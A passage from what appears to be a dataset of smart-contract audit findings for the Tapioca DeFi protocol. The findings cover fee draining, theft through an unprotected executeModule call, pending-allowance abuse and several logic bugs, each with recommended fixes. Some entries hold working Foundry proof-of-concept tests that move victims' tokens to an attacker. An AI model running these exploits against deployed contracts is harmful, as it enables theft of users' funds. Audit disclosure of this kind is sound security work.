abi.encodePacked(OFTMsgCodec.addressToBytes32(address(aUsdo)), toeComposeMsg), // message\\n address(0), // executor (not used)\\n bytes("""") // extra data (not used)\\n );\\n\\n vm.startPrank(endpoints[aEid]);\\n\\n // Receive nextMsg in chain A, mint tokens to the attacker\\n uint64 tokenAmountSD = usdoHelper.toSD(100 ether, aUsdo.decimalConversionRate());\\n\\n UsdoReceiver(address(aUsdo)).lzReceive(\\n Origin({sender: OFTMsgCodec.addressToBytes32(address(bUsdo)), srcEid: bEid, nonce: 0}), \\n OFTMsgCodec.addressToBytes32(address(0)), // guid (not needed for the PoC)\\n abi.encodePacked( // same as _buildOFTMsgAndOptions()\\n OFTMsgCodec.addressToBytes32(makeAddr(""attacker"")),\\n tokenAmountSD\\n ), // message\\n address(0), // executor (not used)\\n bytes("""") // extra data (not used)\\n );\\n \\n\\n // Finished: bUSDO fees get drained, attacker obtains all the fees in the form of aUSDO\\n assertEq(bUsdo.balanceOf(address(bUsdo)), 0);\\n assertEq(aUsdo.balanceOf(makeAddr(""attacker"")), 100 ether);\\n \\n }\\n```\\n\\nRun the poc with the following command: `forge test --mt testVuln_USDOBorrowFeesCanBeDrained`\\nThe proof of concept shows how in the end, USDO's `bUsdo` balance will become 0, while the same amount ofaUsdo in chain A will be minted to the attacker.","Ensure that the `_lzCompose()` call triggered when a `_nextMsg` exists keeps a consistent source chain sender address, instead of hardcoding it to `address(this)` :\\n```\\n// TapiocaOmnichainReceiver.sol\\n\\nfunction _lzCompose(address srcChainSender_, bytes32 _guid, bytes memory oftComposeMsg_) internal {\\n \\n // Decode OFT compose message.\\n (uint16 msgType_,,, bytes memory tapComposeMsg_, bytes memory nextMsg_) =\\n TapiocaOmnichainEngineCodec.decodeToeComposeMsg(oftComposeMsg_);\\n\\n // rest of code\\n \\n emit ComposeReceived(msgType_, _guid, tapComposeMsg_);\\n if (nextMsg_.length > 0) {\\n// Remove the line below\\n _lzCompose(address(this), _guid, nextMsg_);‚\\n// Add the line below\\n _lzCompose(srcChainSender_, _guid, nextMsg_);\\n }\\n }\\n```\\n","High, all fees generated by the USDO contract can be effectively stolen by the attacker","```\\n// USDOFlashloanHelper.sol\\nfunction flashLoan(IERC3156FlashBorrower receiver, address token, uint256 amount, bytes calldata data)\\n external\\n override\\n returns (bool)\\n {\\n \\n // rest of code\\n\\n IERC20(address(usdo)).safeTransferFrom(address(receiver), address(usdo), fee);\\n \\n _flashloanEntered = false;\\n\\n return true;\\n }\\n```\\n" +Unprotected `executeModule` function allows to steal the tokens,high,"The `executeModule` function allows anyone to execute any module with any params. That allows attacker to execute operations on behalf of other users.\\nHere is the `executeModule` function:\\nAll its parameters are controlled by the caller and anyone can be the caller. Anyone can execute any module on behalf of any user.\\nLet's try to steal someone's tokens using `UsdoMarketReceiver` module and `removeAssetReceiver` function (below is the PoC).\\nHere is the code that will call the `executeModule` function:\\n```\\nbUsdo.executeModule(\\n IUsdo.Module.UsdoMarketReceiver, \\n abi.encodeWithSelector(\\n UsdoMarketReceiverModule.removeAssetReceiver.selector, \\n marketMsg_), \\n false);\\n```\\n\\nThe important value here is the `marketMsg_` parameter. The `removeAssetReceiver` function forwards the call to `exitPositionAndRemoveCollateral` function via magnetar contract.\\nThe `exitPositionAndRemoveCollateral` function removes asset from Singularity market if the `data.removeAndRepayData.removeAssetFromSGL` is `true`. The amount is taken from `data.removeAndRepayData.removeAmount`. Then, if `data.removeAndRepayData.assetWithdrawData.withdraw` is `true`, the `_withdrawToChain` is called.\\nIn `_withdrawToChain`, if the `data.lzSendParams.sendParam.dstEid` is zero, the `_withdrawHere` is called that transfers asset to `data.lzSendParams.sendParam.to`.\\nSumming up, the following `marketMsg_` struct can be used to steal userB's assets from singularity market by `userA`.\\n```\\nMarketRemoveAssetMsg({\\n user: address(userB),//victim\\n externalData: ICommonExternalContracts({\\n magnetar: address(magnetar),\\n singularity: address(singularity),\\n bigBang: address(0),\\n marketHelper: address(marketHelper)\\n }),\\n removeAndRepayData: IRemoveAndRepay({\\n removeAssetFromSGL: true,//remove from Singularity market\\n removeAmount: tokenAmountSD,//amount to remove\\n repayAssetOnBB: false,\\n repayAmount: 0,\\n removeCollateralFromBB: false,\\n collateralAmount: 0,\\n exitData: IOptionsExitData({exit: false, target: address(0), oTAPTokenID: 0}),\\n unlockData: IOptionsUnlockData({unlock: false, target: address(0), tokenId: 0}),\\n assetWithdrawData: MagnetarWithdrawData({\\n withdraw: true,//withdraw assets\\n yieldBox: address(yieldBox), //where from to withdraw\\n assetId: bUsdoYieldBoxId, //what asset to withdraw\\n unwrap: false,\\n lzSendParams: LZSendParam({\\n refundAddress: address(userB),\\n fee: MessagingFee({lzTokenFee: 0, nativeFee: 0}),\\n extraOptions: ""0x"",\\n sendParam: SendParam({\\n amountLD: 0,\\n composeMsg: ""0x"",\\n dstEid: 0,\\n extraOptions: ""0x"",\\n minAmountLD: 0,\\n oftCmd: ""0x"",\\n to: OFTMsgCodec.addressToBytes32(address(userA)) // recipient of the assets\\n })\\n }),\\n sendGas: 0,\\n composeGas: 0,\\n sendVal: 0,\\n composeVal: 0,\\n composeMsg: ""0x"",\\n composeMsgType: 0\\n }),\\n collateralWithdrawData: MagnetarWithdrawData({\\n withdraw: false,\\n yieldBox: address(0),\\n assetId: 0,\\n unwrap: false,\\n lzSendParams: LZSendParam({\\n refundAddress: address(userB),\\n fee: MessagingFee({lzTokenFee: 0, nativeFee: 0}),\\n extraOptions: ""0x"",\\n sendParam: SendParam({\\n amountLD: 0,\\n composeMsg: ""0x"",\\n dstEid: 0,\\n extraOptions: ""0x"",\\n minAmountLD: 0,\\n oftCmd: ""0x"",\\n to: OFTMsgCodec.addressToBytes32(address(userB))\\n })\\n }),\\n sendGas: 0,\\n composeGas: 0,\\n sendVal: 0,\\n composeVal: 0,\\n composeMsg: ""0x"",\\n composeMsgType: 0\\n })\\n })\\n});\\n```\\n\\nHere is the modified version of the `test_market_remove_asset` test that achieves the same result, but with unauthorized call to `executeModule` function. The `userA` is the attacker, and `userB` is the victim.\\n```\\n function test_malicious_market_remove_asset() public {\\n uint256 erc20Amount_ = 1 ether;\\n\\n // setup\\n {\\n deal(address(bUsdo), address(userB), erc20Amount_);\\n\\n vm.startPrank(userB);\\n bUsdo.approve(address(yieldBox), type(uint256).max);\\n yieldBox.depositAsset(bUsdoYieldBoxId, address(userB), address(userB), erc20Amount_, 0);\\n\\n uint256 sh = yieldBox.toShare(bUsdoYieldBoxId, erc20Amount_, false);\\n yieldBox.setApprovalForAll(address(pearlmit), true);\\n pearlmit.approve(\\n address(yieldBox), bUsdoYieldBoxId, address(singularity), uint200(sh), uint48(block.timestamp + 1)\\n );\\n singularity.addAsset(address(userB), address(userB), false, sh);\\n vm.stopPrank();\\n }\\n\\n uint256 tokenAmount_ = 0.5 ether;\\n\\n /**\\n * Actions\\n */\\n uint256 tokenAmountSD = usdoHelper.toSD(tokenAmount_, aUsdo.decimalConversionRate());\\n\\n //approve magnetar\\n vm.startPrank(userB);\\n bUsdo.approve(address(magnetar), type(uint256).max);\\n singularity.approve(address(magnetar), type(uint256).max);\\n vm.stopPrank();\\n \\n MarketRemoveAssetMsg memory marketMsg = MarketRemoveAssetMsg({\\n user: address(userB),\\n externalData: ICommonExternalContracts({\\n magnetar: address(magnetar),\\n singularity: address(singularity),\\n bigBang: address(0),\\n marketHelper: address(marketHelper)\\n }),\\n removeAndRepayData: IRemoveAndRepay({\\n removeAssetFromSGL: true,\\n removeAmount: tokenAmountSD,\\n repayAssetOnBB: false,\\n repayAmount: 0,\\n removeCollateralFromBB: false,\\n collateralAmount: 0,\\n exitData: IOptionsExitData({exit: false, target: address(0), oTAPTokenID: 0}),\\n unlockData: IOptionsUnlockData({unlock: false, target: address(0), tokenId: 0}),\\n assetWithdrawData: MagnetarWithdrawData({\\n withdraw: true,\\n yieldBox: address(yieldBox),\\n assetId: bUsdoYieldBoxId,\\n unwrap: false,\\n lzSendParams: LZSendParam({\\n refundAddress: address(userB),\\n fee: MessagingFee({lzTokenFee: 0, nativeFee: 0}),\\n extraOptions: ""0x"",\\n sendParam: SendParam({\\n amountLD: 0,\\n composeMsg: ""0x"",\\n dstEid: 0,\\n extraOptions: ""0x"",\\n minAmountLD: 0,\\n oftCmd: ""0x"",\\n to: OFTMsgCodec.addressToBytes32(address(userA)) // transfer to attacker\\n })\\n }),\\n sendGas: 0,\\n composeGas: 0,\\n sendVal: 0,\\n composeVal: 0,\\n composeMsg: ""0x"",\\n composeMsgType: 0\\n }),\\n collateralWithdrawData: MagnetarWithdrawData({\\n withdraw: false,\\n yieldBox: address(0),\\n assetId: 0,\\n unwrap: false,\\n lzSendParams: LZSendParam({\\n refundAddress: address(userB),\\n fee: MessagingFee({lzTokenFee: 0, nativeFee: 0}),\\n extraOptions: ""0x"",\\n sendParam: SendParam({\\n amountLD: 0,\\n composeMsg: ""0x"",\\n dstEid: 0,\\n extraOptions: ""0x"",\\n minAmountLD: 0,\\n oftCmd: ""0x"",\\n to: OFTMsgCodec.addressToBytes32(address(userB))\\n })\\n }),\\n sendGas: 0,\\n composeGas: 0,\\n sendVal: 0,\\n composeVal: 0,\\n composeMsg: ""0x"",\\n composeMsgType: 0\\n })\\n })\\n });\\n bytes memory marketMsg_ = usdoHelper.buildMarketRemoveAssetMsg(marketMsg);\\n\\n\\n // I added _checkSender in MagnetarMock (function exitPositionAndRemoveCollateral) so need to whitelist USDO\\n cluster.updateContract(aEid, address(bUsdo), true);\\n\\n // ----- ADDED THIS ------>\\n // Attack using executeModule\\n // ------------------------\\n vm.startPrank(userA);\\n bUsdo.executeModule(\\n IUsdo.Module.UsdoMarketReceiver, \\n abi.encodeWithSelector(\\n UsdoMarketReceiverModule.removeAssetReceiver.selector, \\n marketMsg_), \\n false);\\n // ------------------------\\n\\n // Check execution\\n {\\n assertEq(bUsdo.balanceOf(address(userB)), 0);\\n assertEq(\\n yieldBox.toAmount(bUsdoYieldBoxId, yieldBox.balanceOf(address(userB), bUsdoYieldBoxId), false),\\n 0\\n );\\n assertEq(bUsdo.balanceOf(address(userA)), tokenAmount_);\\n }\\n }\\n```\\n\\nNote: The `burst` function was modified in the MagnetarMock contract and add call to `_checkSender` function to reproduce the real situation.\\nThat is also why the `bUsdo` has been whitelisted in the test.",The `executeModule` function should inspect and validate the `_data` parameter to make sure that the caller is the same address as the user who executes the operations.,HIGH - Anyone can steal others' tokens from their markets.,"```\\nbUsdo.executeModule(\\n IUsdo.Module.UsdoMarketReceiver, \\n abi.encodeWithSelector(\\n UsdoMarketReceiverModule.removeAssetReceiver.selector, \\n marketMsg_), \\n false);\\n```\\n" +Pending allowances can be exploited,high,"Pending allowances can be exploited in multiple places in the codebase.\\n`TOFT::marketRemoveCollateralReceiver` has the following flow:\\nIt calls `removeCollateral` ona a market with the following parameters: `from = msg_user`, `to = msg_.removeParams.magnetar`.\\nInside the `SGLCollateral::removeCollateral` `_allowedBorrow` is called and check if the `from = msg_user` address has given enough `allowanceBorrow` to the `msg.sender` which in this case is the TOFT contract.\\nSo for a user to use this flow in needs to call:\\n```\\nfunction approveBorrow(address spender, uint256 amount) external returns (bool) {\\n _approveBorrow(msg.sender, spender, amount);\\n return true;\\n }\\n```\\n\\nAnd give the needed allowance to the TOFT contract.\\nThis results in collateral being removed and transferred into the Magnetar contract with `yieldBox.transfer(address(this), to, collateralId, share);`.\\nThe Magnetar gets the collateral, and it can withdraw it to any address specified in the `msg_.withdrawParams`.\\nThis is problematic as the `TOFT::marketRemoveCollateralReceiver` doesn't check the `msg.sender`. In practice this means if Alice has called `approveBorrow` and gives the needed allowance with the intention of using the `marketRemoveCollateralReceiver` flow, Bob can use the `marketRemoveCollateralReceiver` flow and withdraw all the collateral from Alice to his address.\\nSo, any pending allowances from any user can immediately be exploited to steal the collateral.\\nOther occurrences\\nThere are a few other occurrences of this problematic pattern in the codebase.\\n`TOFT::marketBorrowReceiver` expects the user to give an approval to the Magnetar contract. The approval is expected inside the `_extractTokens` function where `pearlmit.transferFromERC20(_from, address(this), address(_token), _amount);` is called. Again, the `msg.sender` is not checked inside the `marketBorrowReceiver` function, so this flow can be abused by another user to borrow and withdraw the borrowed amount to his address.\\n`TOFT::mintLendXChainSGLXChainLockAndParticipateReceiver` also allows to borrow inside the BigBang market and withdraw the borrowed amount to an arbitrary address.\\n`TOF::exerciseOptionsReceiver` has the `_internalTransferWithAllowance` function that simply allows to transfer TOFT tokens from any `_options.from` address that has given an allowance to `srcChainSender`, by anyone that calls this function. It allows to forcefully call the `exerciseOptionsReceiver` on behalf of any other user.\\n`USDO::depositLendAndSendForLockingReceiver` also expects the user to give an allowance to the Magnetar contract, i.e. `MagnetarAssetXChainModule::depositYBLendSGLLockXchainTOLP` calls the `_extractTokens`.",There are multiple instances of issues with dangling allowances in the protocol. Review all the allowance flows and make sure it can't be exploited.,The impact of this vulnerability is that any pending allowances from any user can immediately be exploited to steal the collateral/borrowed amount.,"```\\nfunction approveBorrow(address spender, uint256 amount) external returns (bool) {\\n _approveBorrow(msg.sender, spender, amount);\\n return true;\\n }\\n```\\n" +Incorrect `tapOft` Amounts Will Be Sent to Desired Chains on Certain Conditions,medium,"TOFTOptionsReceiverModule::exerciseOptionsReceiver module, is responsible for facilitating users' token exercises between `mTOFT` and `tapOFT` tokens across different chains. In a `msg-type` where the user wishes to receive the `tapOFT` tokens on a different chain, the module attempts to ensure the amount sent to the user on the desired chain, aligns with the received tap amount in the current chain. However, a flaw exists where the computed amount to send is not updated in the send parameters, resulting in incorrect token transfer.\\nTOFTOptionsReceiverModule::exerciseOptionsReceiver module is a module that enables users to exercise their `mTOFT` tokens for a given amount of `tapOFT` option tokens.\\nWhen the user wishes to withdraw these `tapOft` tokens on a different chain, the withdrawOnOtherChain param will be set to true. For this composed call type, the contract attempts to ensure the amount to send to the user on the other chain isn't more than the received `tap amount`, by doing this:\\n```\\n uint256 amountToSend = _send.amountLD > _options.tapAmount ? _options.tapAmount : _send.amountLD;\\n if (_send.minAmountLD > amountToSend) {\\n _send.minAmountLD = amountToSend;\\n }\\n```\\n\\nThe issue here is that, the computed amount to send, is never updated in the `lsSendParams.sendParam`, the current code still goes on to send the packet to the destination chain with the default input amount:\\n```\\n if (msg_.withdrawOnOtherChain) {\\n /// @dev determine the right amount to send back to source\\n uint256 amountToSend = _send.amountLD > _options.tapAmount ? _options.tapAmount : _send.amountLD;\\n if (_send.minAmountLD > amountToSend) {\\n _send.minAmountLD = amountToSend;\\n }\\n\\n\\n // Sends to source and preserve source `msg.sender` (`from` in this case).\\n _sendPacket(msg_.lzSendParams, msg_.composeMsg, _options.from);\\n\\n\\n // Refund extra amounts\\n if (_options.tapAmount - amountToSend > 0) {\\n IERC20(tapOft).safeTransfer(_options.from, _options.tapAmount - amountToSend);\\n }\\n```\\n\\nTo Illustrate:\\nassuming send `amountLD` = 100 and the user is to receive a tap amount of = 80 since `amountLD` is greater than tap amount, the amount to send should be 80, i.e. `msg_.lzSendParams.sendParam.amountLD` = 80 The current code goes on to send the default 100 to the user, when the user is only entitled to 80",update the lz send param `amountLD` to the new computed `amountToSend` before sending the packet\\nI.e :\\n```\\nmsg_.lzSendParams.sendParam.amountLD = amountToSend;\\n```\\n\\nNote that the issue should also be fixed in Tapioca-Bar as well,The user will always receive an incorrect amount of `tapOFT` in the desired chain whenever `amountLD` is greater than `tapAmount`,```\\n uint256 amountToSend = _send.amountLD > _options.tapAmount ? _options.tapAmount : _send.amountLD;\\n if (_send.minAmountLD > amountToSend) {\\n _send.minAmountLD = amountToSend;\\n }\\n```\\n +Underflow Vulnerability in `Market::_allowedBorrow` Function: Oversight with Pearlmit Allowance Handling,medium,"The protocol permits users to authorize spenders using the MarketERC20::approveBorrow function, and also includes support for allowances granted through the `Pearlmit` contract. However, an oversight in the _allowedBorrow function leads to an underflow issue when spenders utilize `Pearlmit` allowances, rendering them unable to execute borrowing actions despite having the necessary permission.\\nProtocol users can approve a spender via MarketERC20::approveBorrow function, to perform certain actions like `borrow`, `repay` or adding of collateral on their behalf. Whenever the spender calls any of these functionalities, down the execution _allowedBorrow is invoked to check if the caller is allowed to `borrow` `share` `from` `from`, and then decrease the spender's allowance by the `share` amount.\\n```\\n function _allowedBorrow(address from, uint256 share) internal virtual override {\\n if (from != msg.sender) {\\n // TODO review risk of using this\\n (uint256 pearlmitAllowed,) = penrose.pearlmit().allowance(from, msg.sender, address(yieldBox), collateralId);\\n require(allowanceBorrow[from][msg.sender] >= share || pearlmitAllowed >= share, ""Market: not approved"");\\n if (allowanceBorrow[from][msg.sender] != type(uint256).max) {\\n allowanceBorrow[from][msg.sender] -= share;\\n }\\n }\\n }\\n```\\n\\nThe problem here is, _allowedBorrow will always revert due to an underflow whenever the spender is given an allowance in the `Pearlmit` contract.\\nTo Illustrate\\nAssuming we have two users, Bob and Alice, since `Pearlmit` allowance is also accepted, Alice grants Bob a borrowing allowance of `100` tokens for the collateral id using `Pearlmit`. Note that Bob's allowance in the Market contract for Alice will be `zero(0)` and `100` in `Pearlmit`.\\nWhen Bob tries to borrow an amount equal to his `Pearlmit` allowance, down the borrow logic `_allowedBorrow` is called, in `_allowedBorrow` function, the below requirement passes, since the returned `pearlmitAllowed` for Bob will equal `100` shares\\n```\\n require(allowanceBorrow[from][msg.sender] >= share || pearlmitAllowed >= share, ""Market: not approved"");\\n```\\n\\nRemember Bob's allowance in the Market contract for Alice is `0`, but `100` in `Pearlmit`, but _allowedBorrow function erroneously attempts to deduct the share from Bob's Market allowance, which will thus result in an underflow revert(0 - 100).\\n```\\n if (allowanceBorrow[from][msg.sender] != type(uint256).max) {\\n allowanceBorrow[from][msg.sender] -= share;\\n }\\n```\\n","After ensuring that the user has got the approval, return when permission from `Pearlmit` is used:\\n```\\n function _allowedBorrow(address from, uint256 share) internal virtual override {\\n if (from != msg.sender) {\\n // TODO review risk of using this\\n (uint256 pearlmitAllowed,) = penrose.pearlmit().allowance(from, msg.sender, address(yieldBox), collateralId);\\n require(allowanceBorrow[from][msg.sender] >= share || pearlmitAllowed >= share, ""Market: not approved"");\\n+ if (pearlmitAllowed != 0) return;\\n if (allowanceBorrow[from][msg.sender] != type(uint256).max) {\\n allowanceBorrow[from][msg.sender] -= share;\\n }\\n }\\n }\\n```\\n\\nOr remove support for `Pearlmit` allowance","Although giving a spender allowance via `Pearlmit` will appear to be supported, the spender cannot carry out any borrowing action in the Market.","```\\n function _allowedBorrow(address from, uint256 share) internal virtual override {\\n if (from != msg.sender) {\\n // TODO review risk of using this\\n (uint256 pearlmitAllowed,) = penrose.pearlmit().allowance(from, msg.sender, address(yieldBox), collateralId);\\n require(allowanceBorrow[from][msg.sender] >= share || pearlmitAllowed >= share, ""Market: not approved"");\\n if (allowanceBorrow[from][msg.sender] != type(uint256).max) {\\n allowanceBorrow[from][msg.sender] -= share;\\n }\\n }\\n }\\n```\\n" +The repaying action in `BBLeverage.sellCollateral` function pulls YieldBox shares of asset from wrong address,medium,"The `sellCollateral` function is used to sell a user's collateral to obtain YieldBox shares of the asset and repay the user's loan. However, in the BBLeverage contract, it calls `_repay` with the `from` parameter set to the user, even though the asset shares have already been collected by this contract beforehand.\\nIn `BBLeverage.sellCollateral`, the `from` variable (user) is used as the repayer address.\\n```\\nif (memoryData.shareOwed <= memoryData.shareOut) {\\n _repay(from, from, memoryData.partOwed);\\n} else {\\n //repay as much as we can\\n uint256 partOut = totalBorrow.toBase(amountOut, false);\\n _repay(from, from, partOut);\\n}\\n```\\n\\nTherefore, asset shares of user will be pulled in `BBLendingCommon._repay` function.\\n```\\nfunction _repay(address from, address to, uint256 part) internal returns (uint256 amount) {\\n // rest of code\\n // @dev amount includes the opening & accrued fees\\n yieldBox.withdraw(assetId, from, address(this), amount, 0);\\n // rest of code\\n```\\n\\nThis is incorrect behavior since the necessary asset shares were already collected by the contract in the `BBLeverage.sellCollateral` function. The repayer address should be `address(this)` for `_repay`.","Should fix as following:\\n```\\nif (memoryData.shareOwed <= memoryData.shareOut) {\\n _repay(address(this), from, memoryData.partOwed);\\n} else {\\n //repay as much as we can\\n uint256 partOut = totalBorrow.toBase(amountOut, false);\\n _repay(address(this), from, partOut);\\n}\\n```\\n",Mistakenly pulling user funds while the received asset shares remain stuck in the contract will result in losses for users who have sufficient allowance and balance when using the `BBLeverage.sellCollateral` functionality.,"```\\nif (memoryData.shareOwed <= memoryData.shareOut) {\\n _repay(from, from, memoryData.partOwed);\\n} else {\\n //repay as much as we can\\n uint256 partOut = totalBorrow.toBase(amountOut, false);\\n _repay(from, from, partOut);\\n}\\n```\\n" +`leverageAmount` is incorrect in `SGLLeverage.sellCollateral` function due to calculation based on the new states of YieldBox after withdrawal,medium,"See vulnerability detail\\n`SGLLeverage.sellCollateral` function attempts to remove the user's collateral in shares of YieldBox, then withdraws those collateral shares to collect collateral tokens. Subsequently, the received collateral tokens can be used to swap for asset tokens.\\nHowever, the `leverageAmount` variable in this function does not represent the actual withdrawn tokens from the provided shares because it is calculated after the withdrawal.\\n```\\nyieldBox.withdraw(collateralId, address(this), address(leverageExecutor), 0, calldata_.share);\\nuint256 leverageAmount = yieldBox.toAmount(collateralId, calldata_.share, false);\\n\\namountOut = leverageExecutor.getAsset(\\n assetId, address(collateral), address(asset), leverageAmount, calldata_.from, calldata_.data\\n);\\n```\\n\\n`yieldBox.toAmount` after withdrawal may return different from the actual withdrawn token amount, because the states of YieldBox has changed. Because the token amount is calculated with rounding down in YieldBox, `leverageAmount` will be higher than the actual withdrawn amount.\\nFor example, before the withdrawal, YieldBox had 100 total shares and 109 total tokens. Now this function attempt to withdraw 10 shares (calldata_.share = 10) -> the actual withdrawn amount = 10 * 109 / 100 = 10 tokens After that, leverageAmount will be calculated based on the new yieldBox's total shares and total tokens -> leverageAmount = 10 * (109 - 10) / (100 - 10) = 11 tokens\\nThe same vulnerability exists in `BBLeverage.sellCollateral` function.","`leverageAmount` should be obtained from the return value of YieldBox.withdraw:\\n```\\n(uint256 leverageAmount, ) = yieldBox.withdraw(collateralId, address(this), address(leverageExecutor), 0, calldata_.share);\\n```\\n","Because `leverageAmount` can be higher than the actual withdrawn collateral tokens, `leverageExecutor.getAsset()` will revert due to not having enough tokens in the contract to pull. This results in a DOS of `sellCollateral`, break this functionality.","```\\nyieldBox.withdraw(collateralId, address(this), address(leverageExecutor), 0, calldata_.share);\\nuint256 leverageAmount = yieldBox.toAmount(collateralId, calldata_.share, false);\\n\\namountOut = leverageExecutor.getAsset(\\n assetId, address(collateral), address(asset), leverageAmount, calldata_.from, calldata_.data\\n);\\n```\\n" +mTOFTReceiver MSG_XCHAIN_LEND_XCHAIN_LOCK unable to execute,medium,"In `mTOFTReceiver._toftCustomComposeReceiver(uint16 _msgType)` If `_msgType` is processed normally, the method must return `true`, if it returns `false`, it will trigger `revert InvalidMsgType()` But when `_msgType == MSG_XCHAIN_LEND_XCHAIN_LOCK` is executed normally, it does not correctly return `true` This causes this type of execution to always fail\\nThe main execution order of `_lzCompose()` is as follows:\\nIf msgType_ == MSG_REMOTE_TRANSFER, execute `_remoteTransferReceiver()`\\nOtherwise, execute `_extExec(msgType_, tapComposeMsg_)`\\nOtherwise, execute `tapiocaOmnichainReceiveExtender`\\nOtherwise, execute `_toeComposeReceiver()`\\nIf the 4th step `_toeComposeReceiver()` returns false, it is considered that the type cannot be found, and `revert InvalidMsgType(msgType_);` is triggered\\nthe code as follows:\\n```\\n function _lzCompose(address srcChainSender_, bytes32 _guid, bytes memory oftComposeMsg_) internal {\\n // Decode OFT compose message.\\n (uint16 msgType_,,, bytes memory tapComposeMsg_, bytes memory nextMsg_) =\\n TapiocaOmnichainEngineCodec.decodeToeComposeMsg(oftComposeMsg_);\\n\\n // Call Permits/approvals if the msg type is a permit/approval.\\n // If the msg type is not a permit/approval, it will call the other receivers.\\n if (msgType_ == MSG_REMOTE_TRANSFER) {\\n _remoteTransferReceiver(srcChainSender_, tapComposeMsg_);\\n } else if (!_extExec(msgType_, tapComposeMsg_)) {\\n // Check if the TOE extender is set and the msg type is valid. If so, call the TOE extender to handle msg.\\n if (\\n address(tapiocaOmnichainReceiveExtender) != address(0)\\n && tapiocaOmnichainReceiveExtender.isMsgTypeValid(msgType_)\\n ) {\\n bytes memory callData = abi.encodeWithSelector(\\n ITapiocaOmnichainReceiveExtender.toeComposeReceiver.selector,\\n msgType_,\\n srcChainSender_,\\n tapComposeMsg_\\n );\\n (bool success, bytes memory returnData) =\\n address(tapiocaOmnichainReceiveExtender).delegatecall(callData);\\n if (!success) {\\n revert(_getTOEExtenderRevertMsg(returnData));\\n }\\n } else {\\n // If no TOE extender is set or msg type doesn't match extender, try to call the internal receiver.\\n if (!_toeComposeReceiver(msgType_, srcChainSender_, tapComposeMsg_)) {\\n revert InvalidMsgType(msgType_);\\n }\\n }\\n }\\n```\\n\\nThe implementation of `mTOFTReceiver._toeComposeReceiver()` is as follows:\\n```\\ncontract mTOFTReceiver is BaseTOFTReceiver {\\n constructor(TOFTInitStruct memory _data) BaseTOFTReceiver(_data) {}\\n\\n function _toftCustomComposeReceiver(uint16 _msgType, address, bytes memory _toeComposeMsg)\\n internal\\n override\\n returns (bool success)\\n {\\n if (_msgType == MSG_LEVERAGE_UP) { //@check\\n _executeModule(\\n uint8(ITOFT.Module.TOFTMarketReceiver),\\n abi.encodeWithSelector(TOFTMarketReceiverModule.leverageUpReceiver.selector, _toeComposeMsg),\\n false\\n );\\n return true;\\n } else if (_msgType == MSG_XCHAIN_LEND_XCHAIN_LOCK) { //@check\\n _executeModule(\\n uint8(ITOFT.Module.TOFTOptionsReceiver),\\n abi.encodeWithSelector(\\n TOFTOptionsReceiverModule.mintLendXChainSGLXChainLockAndParticipateReceiver.selector, _toeComposeMsg\\n ),\\n false\\n );\\n //@audit miss return true\\n } else {\\n return false;\\n }\\n }\\n}\\n```\\n\\nAs mentioned above, because `_msgType == MSG_XCHAIN_LEND_XCHAIN_LOCK` does not return `true`, it always triggers `revert InvalidMsgType(msgType_);`","```\\ncontract mTOFTReceiver is BaseTOFTReceiver {\\n constructor(TOFTInitStruct memory _data) BaseTOFTReceiver(_data) {}\\n\\n function _toftCustomComposeReceiver(uint16 _msgType, address, bytes memory _toeComposeMsg)\\n internal\\n override\\n returns (bool success)\\n {\\n if (_msgType == MSG_LEVERAGE_UP) { //@check\\n _executeModule(\\n uint8(ITOFT.Module.TOFTMarketReceiver),\\n abi.encodeWithSelector(TOFTMarketReceiverModule.leverageUpReceiver.selector, _toeComposeMsg),\\n false\\n );\\n return true;\\n } else if (_msgType == MSG_XCHAIN_LEND_XCHAIN_LOCK) { //@check\\n _executeModule(\\n uint8(ITOFT.Module.TOFTOptionsReceiver),\\n abi.encodeWithSelector(\\n TOFTOptionsReceiverModule.mintLendXChainSGLXChainLockAndParticipateReceiver.selector, _toeComposeMsg\\n ),\\n false\\n );\\n// Add the line below\\n return true;\\n } else {\\n return false;\\n }\\n }\\n}\\n```\\n",`_msgType == MSG_XCHAIN_LEND_XCHAIN_LOCK` `TOFTOptionsReceiver.mintLendXChainSGLXChainLockAndParticipateReceiver()` unable to execute successfully,"```\\n function _lzCompose(address srcChainSender_, bytes32 _guid, bytes memory oftComposeMsg_) internal {\\n // Decode OFT compose message.\\n (uint16 msgType_,,, bytes memory tapComposeMsg_, bytes memory nextMsg_) =\\n TapiocaOmnichainEngineCodec.decodeToeComposeMsg(oftComposeMsg_);\\n\\n // Call Permits/approvals if the msg type is a permit/approval.\\n // If the msg type is not a permit/approval, it will call the other receivers.\\n if (msgType_ == MSG_REMOTE_TRANSFER) {\\n _remoteTransferReceiver(srcChainSender_, tapComposeMsg_);\\n } else if (!_extExec(msgType_, tapComposeMsg_)) {\\n // Check if the TOE extender is set and the msg type is valid. If so, call the TOE extender to handle msg.\\n if (\\n address(tapiocaOmnichainReceiveExtender) != address(0)\\n && tapiocaOmnichainReceiveExtender.isMsgTypeValid(msgType_)\\n ) {\\n bytes memory callData = abi.encodeWithSelector(\\n ITapiocaOmnichainReceiveExtender.toeComposeReceiver.selector,\\n msgType_,\\n srcChainSender_,\\n tapComposeMsg_\\n );\\n (bool success, bytes memory returnData) =\\n address(tapiocaOmnichainReceiveExtender).delegatecall(callData);\\n if (!success) {\\n revert(_getTOEExtenderRevertMsg(returnData));\\n }\\n } else {\\n // If no TOE extender is set or msg type doesn't match extender, try to call the internal receiver.\\n if (!_toeComposeReceiver(msgType_, srcChainSender_, tapComposeMsg_)) {\\n revert InvalidMsgType(msgType_);\\n }\\n }\\n }\\n```\\n" +Multiple contracts cannot be paused,medium,"For safety, tapioca has added `whenNotPaused` restrictions to multiple contracts But there is no method provided to modify the `_paused` state If a security event occurs, it cannot be paused at all\\nTake `mTOFT.sol` as an example, multiple methods are `whenNotPaused`\\n```\\n function executeModule(ITOFT.Module _module, bytes memory _data, bool _forwardRevert)\\n external\\n payable\\n whenNotPaused\\n returns (bytes memory returnData)\\n {\\n// rest of code\\n function sendPacket(LZSendParam calldata _lzSendParam, bytes calldata _composeMsg)\\n public\\n payable\\n whenNotPaused\\n returns (MessagingReceipt memory msgReceipt, OFTReceipt memory oftReceipt)\\n {\\n```\\n\\nBut the contract does not provide a `public` method to modify `_paused` Note: `Pausable.sol` does not have a `public` method to modify `_paused`\\nIn reality, there have been multiple reports of security incidents where the protocol side wants to pause to prevent losses, but cannot pause, strongly recommend adding\\nNote: The following contracts cannot be paused\\nmTOFT\\nTOFT\\nUsdo\\nAssetToSGLPLeverageExecutor",```\\n// Add the line below\\n function pause() external onlyOwner{\\n// Add the line below\\n _pause();\\n// Add the line below\\n }\\n\\n// Add the line below\\n function unpause() external onlyOwner{\\n// Add the line below\\n _unpause();\\n// Add the line below\\n 